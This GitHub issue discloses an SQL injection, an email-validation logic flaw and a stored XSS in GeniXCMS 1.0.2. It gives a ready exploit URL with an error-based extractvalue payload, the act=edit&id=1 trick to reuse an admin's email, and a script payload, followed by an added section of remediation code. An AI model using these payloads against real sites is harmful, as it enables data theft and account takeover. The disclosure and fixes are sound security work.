SQL Injection & Mailbox validation logic vulnerabilities & XSS 1.0.2 #72

Closed
Hecbi opened this issue Apr 25, 2017 · 1 comment

Hecbi commented Apr 25, 2017

SQL Injection

I found a SQL injection at /inc/lib/Control/Backend/menus.control.php, line 247:
https://github.com/semplon/GeniXCMS/blob/master/inc/lib/Control/Backend/menus.control.php line 247

    $sql = sprintf("DELETE FROM `menus` WHERE `menuid` = '%s' ", $_GET['menuid']);
    Db::query($sql);

Go to http://localhost/gxadmin/index.php?page=menus, find a menu and click the del button. Swap the positions of menuid and token, and change menuid into: menuid=hebic'/**/or/**/extractvalue(1,concat(0x7e,database()))/**/or'

exp:/CMS/GeniXCMS-master/gxadmin/index.php?page=menus&token=eMEfQ9xolysmPbu6Ru1EP13Okkqt0A7FeDO8vjCWo1rpshooHHNy9DsCEqV1qtk3poFGcqkhiR0xxKyv&act=remove&menuid=hebic'/**/or/**/extractvalue(1,concat(0x7e,database()))/**/or'


Don't forget to get an active csrftoken.

Mailbox validation logic vulnerabilities

And there is another vulnerability in register.php, line 56:
https://github.com/semplon/GeniXCMS/blob/master/register.php

    // register.php, line 56: the registration form only checks that the address is not taken
    if (!User::isEmail($_POST['email'])) {
        $alertDanger[] = MSG_USER_EMAIL_EXIST;
    }

    // User::isEmail: reads act/id from $_GET even when called from the registration page
    public static function isEmail($vars)
    {
        if (isset($_GET['act']) && $_GET['act'] == 'edit') {
            $id = Typo::int($_GET['id']);
            $where = "AND `id` != '{$id}' ";
        } else {
            $where = '';
        }
        $vars = sprintf('%s', Typo::cleanX($vars));
        $sql = sprintf("SELECT * FROM `user` WHERE `email` = '%s' %s", $vars, $where);
        $e = Db::result($sql);
        if (Db::$num_rows > 0) {
            return false;
        } else {
            return true;
        }
    }

So I can register a new user with the email of user id 1 by using register.php?act=edit&id=1

XSS

Register a user and reply to a post with an XSS payload, e.g.: <script>alert(2)</script>
When the administrator goes into the backend to view this comment and moves the mouse over it, the XSS fires.
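As an added example (not code from GeniXCMS or from the reporter), here is how the three findings above can be closed on the server side: the menu delete bound as a prepared statement, the email-uniqueness check taking the id to exclude as an explicit argument instead of reading `$_GET['act']` and `$_GET['id']`, and comment text escaped before it reaches the admin page. The `$pdo` connection and the `menus`/`user` column names from the snippets above are assumptions.

```php
<?php
// Added example, not GeniXCMS code. Assumes a PDO connection $pdo to the
// same database; table and column names follow the snippets in the report.

/**
 * Delete a menu row. The id is bound as a parameter, so a value such as
 * "hebic' or extractvalue(...) or '" is compared literally and matches nothing.
 */
function deleteMenu(PDO $pdo, string $menuId): int
{
    $stmt = $pdo->prepare('DELETE FROM `menus` WHERE `menuid` = :id');
    $stmt->execute([':id' => $menuId]);
    return $stmt->rowCount(); // rows actually removed
}

/**
 * True if no other user owns $email. Only a caller that is really editing
 * user $excludeId passes it; the function never looks at $_GET, so
 * register.php?act=edit&id=1 cannot turn the registration check into an
 * edit check. Both values are bound, not interpolated.
 */
function isEmailAvailable(PDO $pdo, string $email, ?int $excludeId = null): bool
{
    if (filter_var($email, FILTER_VALIDATE_EMAIL) === false) {
        return false; // malformed addresses are rejected outright
    }
    $sql = 'SELECT COUNT(*) FROM `user` WHERE `email` = :email';
    $params = [':email' => $email];
    if ($excludeId !== null) {
        $sql .= ' AND `id` != :id';
        $params[':id'] = $excludeId;
    }
    $stmt = $pdo->prepare($sql);
    $stmt->execute($params);
    return (int) $stmt->fetchColumn() === 0;
}

/** Escape a stored comment for HTML output so <script> renders as text. */
function renderComment(string $body): string
{
    return htmlspecialchars($body, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

// Registration path: no exclusion is ever passed.
// if (!isEmailAvailable($pdo, $_POST['email'])) { $alertDanger[] = MSG_USER_EMAIL_EXIST; }
// Backend profile edit: the id is the record being edited, taken from the
// authenticated admin flow, not from a query string on the public register page.
// $ok = isEmailAvailable($pdo, $_POST['email'], (int) $editingUserId);
```

The CSRF token check the delete action already requires stays in place; parameter binding only removes the injection, not the need for the token.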

@Hecbi Hecbi changed the title SQL Injection in version 1.0.2 SQL Injection and a bug in version 1.0.2 Apr 26, 2017
@Hecbi Hecbi changed the title SQL Injection and a bug in version 1.0.2 SQL Injection & Mailbox validation logic vulnerabilities & XSS 1.0.2 Apr 26, 2017
@semplon semplon self-assigned this Sep 5, 2017
semplon (Owner) commented Sep 5, 2017

Thank you for reporting the issue. I will fix this issue soon.

semplon pushed a commit that referenced this issue Sep 5, 2017
major update version 1.1.0
#72 bugfix
#76 bugfix
#78 bugfix
improving more securities and add more GneeX theme features
@semplon semplon closed this as completed Sep 5, 2017